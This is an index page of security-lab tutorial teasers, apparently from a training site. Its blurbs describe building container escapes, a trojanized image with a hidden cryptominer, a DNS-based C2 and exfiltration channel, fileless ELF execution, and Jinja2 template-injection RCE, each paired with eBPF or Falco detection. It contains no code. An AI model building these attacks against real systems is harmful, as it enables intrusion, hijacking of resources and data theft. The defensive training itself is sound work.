Deploy a privileged pod, escape to the host via chroot, and detect the full attack chain with eBPF and Gatekeeper policies
Read tutorial →Build a trojanized container image with a hidden cryptominer, detect it with Falco and eBPF, and defend with image scanning and admission control
Read tutorial →Build a DNS-based C2 channel using TXT records and subdomain encoding. Hands-on lab with custom DNS server, data exfiltration scripts, server-side reassembly, and entropy-based detection.
Read tutorial →Transform ELF binaries into fileless payloads, execute them in read-only Kubernetes pods via memfd_create, and observe the full attack chain with eBPF
Read tutorial →Deep analysis of a real-world supply chain malware framework targeting NPM packages, GitHub Actions, and CI/CD pipelines. Includes full source code, MITRE ATT&CK mapping, IOCs, and detection rules.
Read tutorial →Exploit a Flask/Jinja2 Server-Side Template Injection to gain remote code execution inside a Kubernetes pod, then observe the attack with eBPF
Read tutorial →